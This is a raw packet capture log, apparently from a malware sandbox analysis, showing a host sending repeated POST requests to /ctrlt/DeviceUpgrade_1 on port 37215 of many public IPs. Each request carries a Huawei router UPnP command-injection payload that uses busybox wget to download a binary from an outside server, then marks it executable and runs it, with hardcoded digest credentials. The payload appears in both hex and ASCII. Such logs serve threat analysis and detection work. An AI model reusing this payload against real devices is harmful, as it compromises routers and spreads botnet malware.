                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1164192.168.2.154418641.3.106.19837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.949665070 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1165192.168.2.1533548121.48.232.25437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.949897051 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1166192.168.2.1555460190.147.142.8137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.950206041 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1167192.168.2.1549826222.192.239.21437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.950818062 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1168192.168.2.154000641.96.46.16237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.951234102 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1169192.168.2.1558046222.129.174.9237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.951366901 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1170192.168.2.1535910102.185.14.4037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.951626062 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1171192.168.2.153950045.37.132.17437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.952270985 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1172192.168.2.1559832181.226.226.22637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.952559948 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1173192.168.2.1544950121.178.41.7537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.952605963 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
